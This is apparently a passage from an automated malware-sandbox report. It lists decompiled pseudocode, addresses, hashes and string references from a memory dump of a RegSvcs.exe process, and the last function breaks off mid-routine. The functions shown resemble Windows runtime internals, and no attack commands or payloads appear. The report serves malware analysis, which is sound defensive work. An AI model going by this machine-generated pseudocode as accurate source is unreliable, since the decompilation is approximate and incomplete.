                                          0x01301bec
                                          0x01301c0b
                                          0x01301c0b
                                          0x01301c0c
                                          0x01301c11
                                          0x01301c12
                                          0x01301c15
                                          0x01301c1b
                                          0x01301c1f
                                          0x01301c31
                                          0x01301c33
                                          0x01357026
                                          0x01357026
                                          0x01301c21
                                          0x01301c24
                                          0x01301c24
                                          0x01301bee
                                          0x01301bee
                                          0x01301bf2
                                          0x01301c3a
                                          0x01301bf4
                                          0x01301bf4
                                          0x01301c05
                                          0x01301c05
                                          0x01301c09
                                          0x01301c3e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01301c09
                                          0x01301bec
                                          0x01301be0
                                          0x01301bae
                                          0x01301c2e

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: ca8eeab30e7c8bce34fd109a7502aa49ed23a55c61d9503dbd337d8ea77e6565
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: E321C27A901229ABDF23DA5D8890F6BBBEDAF81B58F064425FE049B250D630DD0097A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0131F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                          0x0131f71d
                                          0x0131f722
                                          0x0131f726
                                          0x01364770
                                          0x0131f765
                                          0x0131f769
                                          0x0131f769
                                          0x0131f732
                                          0x0136477a
                                          0x00000000
                                          0x0136477a
                                          0x0131f738
                                          0x0131f73a
                                          0x0131f73c
                                          0x0131f73f
                                          0x0131f746
                                          0x0131f778
                                          0x0131f7a9
                                          0x0131f7a9
                                          0x0131f754
                                          0x0131f75a
                                          0x0131f75d
                                          0x0131f75f
                                          0x0131f761
                                          0x0131f76f
                                          0x0131f771
                                          0x0131f771
                                          0x0131f76f
                                          0x0131f763
                                          0x00000000
                                          0x0131f763
                                          0x0131f77d
                                          0x0131f7a3
                                          0x0131f7a5
                                          0x00000000
                                          0x0131f7a5
                                          0x0131f77f
                                          0x0131f782
                                          0x0131f784
                                          0x0131f786
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131f788
                                          0x0131f748
                                          0x0131f74d
                                          0x0131f78d
                                          0x0131f793
                                          0x0131f7b7
                                          0x0131f7bc
                                          0x00000000
                                          0x0131f7bc
                                          0x0131f798
                                          0x00000000
                                          0x00000000
                                          0x0131f79d
                                          0x0131f7b0
                                          0x00000000
                                          0x0131f7b0
                                          0x0131f79f
                                          0x00000000
                                          0x0131f74f
                                          0x0131f74f
                                          0x00000000
                                          0x0131f74f

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 1c6d46068ec5d10b53eeddce244435a80570e7d5d0445d6932b57cb93c41edf0
                                          • Instruction ID: 2081fab735b623e4563084c373d1bc78d5ded229fdd8266cd06731fd0d9572aa
                                          • Opcode Fuzzy Hash: 1c6d46068ec5d10b53eeddce244435a80570e7d5d0445d6932b57cb93c41edf0
                                          • Instruction Fuzzy Hash: B91108347047068BF72D4E1CC590736769EEB852ECF24453AE462CB7A9D770C8098340
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013A8DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E013A8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x13d0d50);
				E0134D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01385720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E0134DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E0134DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0134D130(_t34, _t39, _t40);
			}





                                          0x013a8df1
                                          0x013a8df1
                                          0x013a8df1
                                          0x013a8df1
                                          0x013a8df1
                                          0x013a8df1
                                          0x013a8df3
                                          0x013a8df8
                                          0x013a8dfd
                                          0x013a8e00
                                          0x013a8e0e
                                          0x013a8e2a
                                          0x013a8e36
                                          0x013a8e38
                                          0x013a8e3c
                                          0x013a8e46
                                          0x013a8e46
                                          0x013a8e36
                                          0x013a8e50
                                          0x013a8e56
                                          0x013a8e59
                                          0x013a8e5c
                                          0x013a8e60
                                          0x013a8e67
                                          0x013a8e6d
                                          0x013a8e73
                                          0x013a8e74
                                          0x013a8eb1
                                          0x013a8ebd

                                          Strings
                                          • Critical error detected %lx, xrefs: 013A8E21
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: 8170e0756c058a7dd07e5e9c523f74fa9095695f4793e8e5caff950016086781
                                          • Instruction ID: f0ae6ae3b5a50162fb3fb1a23aed39c8558980af77edc868681985d95bcef8db
                                          • Opcode Fuzzy Hash: 8170e0756c058a7dd07e5e9c523f74fa9095695f4793e8e5caff950016086781
                                          • Instruction Fuzzy Hash: C1113975D15348EBDF29DFA88505B9CBBB0EB24319F60425EE669AB282D3351601CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FF900 Relevance: .9, Instructions: 863COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E012FF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
